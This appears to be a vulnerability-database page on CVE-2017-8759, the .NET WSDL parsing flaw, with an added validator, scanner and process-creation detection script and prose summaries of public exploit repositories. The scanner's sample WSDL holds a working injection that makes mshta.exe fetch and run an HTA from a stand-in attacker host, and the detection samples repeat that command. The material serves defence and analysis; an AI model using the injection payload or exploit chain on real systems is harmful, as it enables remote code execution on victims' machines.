.NET Framework WSDL Parsing Remote Code Execution
CVE-2017-8759 is a remote code execution vulnerability in Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 caused by improper parsing of WSDL content. The .NET WSDL parser does not reject line breaks in the soap:address location value that it copies into the C# source of a generated proxy class, so an attacker who controls the WSDL can inject statements that are compiled and executed along with the proxy. In observed exploitation, a specially crafted RTF document embeds a SOAP Moniker object that causes Microsoft Office to retrieve a remote WSDL file and hand it to the vulnerable parsing logic, resulting in arbitrary code execution in the context of the user who opened the document. The issue has been actively exploited in the wild and used in phishing campaigns and exploit builders such as ThreadKit.
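The check the parser was missing, and a scanner for WSDL documents that carry the resulting injection, as an added example; this is not code from the page or from any of the repositories summarised below. The generated-code template and the two validators are simplified stand-ins for the .NET WSDL parser, not its source, and the sample WSDL documents, with the hostnames example.invalid and attacker.invalid, are constructed for the example. The scanner works on the raw text rather than through a normalising XML parser because a normalising parser would turn literal line breaks in an attribute value into spaces and hide the very thing being looked for.

```python
import html
import re
from typing import Callable, Dict, List, Optional

# A soap:address element (any namespace prefix) and its location attribute.
# Deliberately a regex over the raw text: the pre-patch reader kept line
# breaks inside attribute values, so the scanner must see them as well.
LOCATION_RE = re.compile(
    r'<(?:[\w-]+:)?address\b[^>]*?\blocation\s*=\s*"([^"]*)"', re.IGNORECASE)

# Simplified stand-in for the line the parser writes into the generated C#
# proxy source that csc.exe then compiles. Not the real .NET template; the
# point is only that the location lands inside a string literal on one line.
PROXY_LINE = '            base.ConfigureProxy(this.GetType(), "{url}");'

# Tokens that have no business in a service endpoint address.
SUSPICIOUS_TOKENS = ("System.Diagnostics.Process", "mshta", "powershell", "cmd.exe")

# Constructed sample: the second soap:address closes the string literal,
# adds its own statement, and comments out the rest of the template line.
INJECTED_WSDL = """<?xml version="1.0" encoding="utf-8"?>
<definitions xmlns="http://schemas.xmlsoap.org/wsdl/"
             xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/">
  <service name="Service">
    <port name="Port" binding="tns:Binding">
      <soap:address location="https://example.invalid/soap"/>
      <soap:address location="&quot;);
System.Diagnostics.Process.Start(&quot;mshta.exe&quot;, &quot;http://attacker.invalid/cmd.hta&quot;);
//"/>
    </port>
  </service>
</definitions>
"""

# Constructed sample: the same document with one ordinary endpoint.
BENIGN_WSDL = """<?xml version="1.0" encoding="utf-8"?>
<definitions xmlns="http://schemas.xmlsoap.org/wsdl/"
             xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/">
  <service name="Service">
    <port name="Port" binding="tns:Binding">
      <soap:address location="https://example.invalid/soap"/>
    </port>
  </service>
</definitions>
"""


def extract_locations(wsdl_text: str) -> List[str]:
    """Location values as the parser saw them: entities such as &quot; and
    &#10; decoded, line breaks kept."""
    return [html.unescape(m.group(1)) for m in LOCATION_RE.finditer(wsdl_text)]


def is_valid_url_vulnerable(url: str) -> bool:
    """Pre-patch shape (simplified): any non-empty value passes."""
    return bool(url)


def is_valid_url_fixed(url: str) -> bool:
    """Post-patch shape (simplified): the value must stay on one line and
    inside the literal it is written into, and must look like an http(s) URL."""
    if not url or any(ch in url for ch in "\r\n\""):
        return False
    return re.fullmatch(r'https?://[^\s"]+', url) is not None


def generate_proxy_line(url: str, validator: Callable[[str], bool]) -> Optional[str]:
    """Emit the proxy source line the parser would, after the given check."""
    if not validator(url):
        return None
    return PROXY_LINE.format(url=url)


def scan_wsdl(wsdl_text: str) -> List[Dict]:
    """Flag location values that cannot be a plain endpoint address."""
    findings = []
    for index, loc in enumerate(extract_locations(wsdl_text)):
        reasons = []
        if "\n" in loc or "\r" in loc:
            reasons.append("line break in location")
        if '"' in loc:
            reasons.append("quote in location")
        hits = [t for t in SUSPICIOUS_TOKENS if t.lower() in loc.lower()]
        if hits:
            reasons.append("suspicious token: " + ", ".join(hits))
        if reasons:
            findings.append({"index": index, "location": loc, "reasons": reasons})
    return findings


def demo() -> Dict:
    """Run the injected location through both validators and scan both files."""
    injected = extract_locations(INJECTED_WSDL)[1]
    return {
        "vulnerable_emits": generate_proxy_line(injected, is_valid_url_vulnerable),
        "fixed_emits": generate_proxy_line(injected, is_valid_url_fixed),
        "findings": scan_wsdl(INJECTED_WSDL),
        "benign_findings": scan_wsdl(BENIGN_WSDL),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

With the vulnerable check the emitted line is `base.ConfigureProxy(this.GetType(), "");` followed by the injected `Process.Start` call on its own line and a `//` that swallows the template's trailing `");`, which is valid C#; the fixed check refuses the value before any source is written. For triage, the line-break and quote findings are the decisive ones, since an address legitimately never contains either; the token list is only a hint.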
Exploits
6 valid exploits after filtering out fakes, detection-only scripts, and README-only repos.
This repository provides a proof-of-concept exploit for CVE-2017-8759 delivered through maliciously crafted OOXML (PPTX/PPSX) files, so the vulnerable .NET WSDL parsing is reached from Microsoft PowerPoint rather than from an RTF document. The exploit shows how a SOAP WSDL file can be manipulated to make mshta.exe fetch and execute a remote HTA payload (w00t.hta), which in turn runs arbitrary code (calc.exe) on the victim's system using VBScript and WMI. The repository includes the exploit components (logo.png, which is actually the crafted WSDL, and w00t.hta, the payload), a detailed README explaining the exploitation technique and its context, and several YARA rules for detecting related malicious documents. The attack is delivered over the network (malicious document delivery and remote payload fetching) and relies on local execution through mshta.exe. The proof of concept demonstrates code execution only and ships no weaponized or customizable payloads.
This repository contains a Python exploit toolkit for CVE-2017-8759, a remote code execution vulnerability in Microsoft .NET Framework. The toolkit (cve-2017-8759_toolkit.py) allows an attacker to generate a malicious RTF file that, when opened by a victim, triggers a SOAP WSDL request to an attacker-controlled server. The attacker can then deliver and execute arbitrary payloads (such as Meterpreter shells) on the victim's Windows system. The script supports two main modes: generating the malicious RTF file (embedding a remote URL) and exploitation mode (serving the payload to the victim). The README provides detailed usage instructions, including example commands and payload generation steps. The exploit is operational and can be used to achieve remote code execution on unpatched Windows systems running vulnerable versions of .NET Framework. The main entry point is the Python script, which handles both RTF generation and payload delivery. The exploit requires the attacker to specify URLs and file paths for payload delivery, making it flexible for different attack scenarios.
This repository is a proof-of-concept exploit for CVE-2017-8759, a remote code execution vulnerability in the Microsoft .NET Framework's handling of untrusted SOAP WSDL input. It contains three files: a README.md describing the vulnerability and the affected .NET Framework versions, a malicious RTF file (cve-2017-8759.rtf) that triggers the exploit when opened in Microsoft Word, and Exploit.png, which is not an image but the XML/SOAP/WSDL content that carries the attack. The exploit abuses the way the .NET WSDL parser turns the WSDL into generated, compiled proxy code, allowing an attacker to execute arbitrary code (here, launching mshta.exe to fetch and run a remote HTA script). The attacker must host a web server to serve the WSDL and payload, and the victim must open the malicious RTF document. The exploit targets multiple versions of Microsoft .NET Framework on Windows. The repository includes no weaponized payload but provides a working proof of concept for the exploit chain.
This repository provides a proof-of-concept (PoC) exploit for CVE-2017-8759, a vulnerability in Microsoft .NET Framework's SOAP WSDL parsing. The repository contains two files: a README.md with background and credits, and exploit.txt, which is a maliciously crafted WSDL (XML) file. The exploit leverages a <soap:address> element to invoke mshta.exe on the target Windows system, instructing it to fetch and execute a remote payload (e.g., https://example.com/cmd.jpg). The exploit demonstrates how an attacker can achieve arbitrary code execution on a vulnerable system by getting the target to process this WSDL file. The repository does not include a full weaponized payload, but provides the structure necessary for weaponization. No detection scripts are present; the content is focused on exploitation.
This repository is a proof-of-concept exploit for CVE-2017-8759, a vulnerability in the Microsoft .NET Framework WSDL parser that allows remote code execution. The exploit chain involves a malicious Word document macro that downloads a specially crafted WSDL (exploit.txt) from a web server. The WSDL triggers the vulnerable parser, which results in the execution of mshta.exe to run a remote HTA file (cmd.hta). The HTA file contains VBScript that uses WMI to launch a PowerShell command, which in this sample runs mspaint.exe. The repository includes:
- server.py: a simple Python HTTP server that hosts the exploit files.
- exploit.txt: the malicious WSDL file that triggers the exploit.
- cmd.hta: the payload file containing the VBScript that executes the command.
- README.md: instructions and background on the exploit.
The exploit is a POC and demonstrates code execution (launching mspaint.exe) on a vulnerable Windows system. The main fingerprintable endpoints are the local HTTP server (http://127.0.0.1:8080), the mshta.exe binary, and the cmd.hta payload. The exploit requires user interaction (opening a malicious document) and a vulnerable configuration.
This repository is an exploit toolkit for CVE-2017-8759, a remote code execution vulnerability in Microsoft .NET Framework (versions 2.0 through 4.7). The main code file (CVE.cs) is a C# program that generates a malicious RTF document. The user provides the path to a shell executable and an output file location; the tool embeds the shell path into a specially crafted RTF payload. When the generated RTF file is opened on a vulnerable system, it triggers the exploit, resulting in execution of the specified shell. The repository includes standard Visual Studio project files, a README with usage instructions, and references to the developer's website and the original exploit. The exploit is operational, requiring the attacker to craft and deliver the malicious document to a target running a vulnerable version of .NET Framework on Windows.
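Every chain summarised above ends the same way on the endpoint: an Office application opens the document and mshta.exe is started with a remote HTA URL. The following detection logic, an added example rather than code from the page or from any of these repositories, runs two process-creation rules over constructed, Sysmon-like event records and then correlates them per Office process. The JSON field names (pid, ppid, image, cmdline, parent_image) are a convention chosen for the example, and the hostnames attacker.invalid and intranet.example are placeholders. One step of the chain that the summaries do not spell out: the .NET WSDL parser compiles the generated proxy with csc.exe, so during exploitation csc.exe appears as a child of the Office process, which is the signal the first rule keys on.

```python
import json
import re
from collections import defaultdict
from typing import Dict, List, Set

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed sample events (one JSON object per line, field names chosen for
# this example): a developer's benign csc.exe run, a Word process that
# compiles a proxy and launches mshta.exe against a remote HTA, and two
# mshta.exe runs that are not part of such a chain.
SAMPLE_EVENTS = r"""
{"pid": 1200, "ppid": 1000, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe", "parent_image": "C:\\Windows\\explorer.exe"}
{"pid": 1210, "ppid": 1200, "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", "cmdline": "csc.exe /t:library build.cs", "parent_image": "C:\\Windows\\System32\\cmd.exe"}
{"pid": 2000, "ppid": 1000, "image": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE", "cmdline": "WINWORD.EXE invoice.rtf", "parent_image": "C:\\Windows\\explorer.exe"}
{"pid": 2010, "ppid": 2000, "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", "cmdline": "csc.exe /noconfig /fullpaths @\"C:\\Users\\u\\AppData\\Local\\Temp\\proxy.cmdline\"", "parent_image": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE"}
{"pid": 2011, "ppid": 2010, "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe", "cmdline": "cvtres.exe /NOLOGO /READONLY", "parent_image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe"}
{"pid": 2020, "ppid": 2000, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe http://attacker.invalid/cmd.hta", "parent_image": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE"}
{"pid": 3000, "ppid": 1000, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe C:\\Users\\u\\tools\\local.hta", "parent_image": "C:\\Windows\\explorer.exe"}
{"pid": 3100, "ppid": 1000, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe https://intranet.example/app.hta", "parent_image": "C:\\Windows\\explorer.exe"}
"""


def parse_events(text: str) -> List[dict]:
    """Parse one JSON event per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[dict]) -> List[dict]:
    """Per-event rules for the two visible steps of the chain."""
    alerts = []
    for ev in events:
        image, parent = basename(ev["image"]), basename(ev["parent_image"])
        from_office = parent in OFFICE_APPS
        if image == "csc.exe" and from_office:
            # Office has no business compiling C#: this is the WSDL parser
            # building the proxy in which the injected code lives.
            alerts.append({"rule": "office_spawns_csc", "pid": ev["pid"],
                           "office_pid": ev["ppid"], "severity": "high"})
        if image == "mshta.exe":
            match = URL_RE.search(ev["cmdline"])
            if match:
                # A remote HTA is suspicious anywhere; under Office it is the
                # payload stage of this exploit chain.
                alerts.append({"rule": "mshta_remote_hta", "pid": ev["pid"],
                               "office_pid": ev["ppid"] if from_office else None,
                               "severity": "high" if from_office else "medium",
                               "url": match.group(0)})
    return alerts


def correlate(alerts: List[dict]) -> Dict[int, Set[str]]:
    """Group fired rules by the Office process they hang off."""
    chains: Dict[int, Set[str]] = defaultdict(set)
    for alert in alerts:
        if alert["office_pid"] is not None:
            chains[alert["office_pid"]].add(alert["rule"])
    return dict(chains)


def full_chains(alerts: List[dict]) -> List[int]:
    """Office processes that both compiled code and ran a remote HTA."""
    wanted = {"office_spawns_csc", "mshta_remote_hta"}
    return sorted(pid for pid, rules in correlate(alerts).items() if wanted <= rules)


if __name__ == "__main__":
    found = detect(parse_events(SAMPLE_EVENTS))
    for alert in found:
        print(alert)
    print("CVE-2017-8759-like chains under Office PIDs:", full_chains(found))
```

On the sample, the developer's csc.exe under cmd.exe and the local HTA produce nothing, the intranet HTA from explorer.exe is a medium-severity single alert, and only the Word process (PID 2000) matches both rules and is reported as a full chain. The same two rules translate directly into Sigma process_creation selections on ParentImage and CommandLine if you would rather ship them to a SIEM than run them in a script.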
Affected products & vendors
Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 on Windows. The observed delivery path runs through Microsoft Office documents (RTF files carrying a SOAP moniker, and crafted OOXML opened in PowerPoint), so Office installations on hosts with an unpatched .NET Framework are the practical exposure.
Recent activity
12 sources tracked across advisories, community write-ups, and news.
A Microsoft .NET Framework vulnerability referenced as exploited by the MuddyWater threat actor; included in a list of exploited vulnerabilities with a CVSS score of 7.8.
A Microsoft Office/.NET remote code execution vulnerability leveraged via malicious documents carrying SOAP content to download and execute an HTA, which then extracts and executes embedded payloads.
A write-up on Microsoft Office DDE protocol abuse (a separate document-based code execution technique, not CVE-2017-8759) that lets attackers download and execute malware when a user opens a malicious document.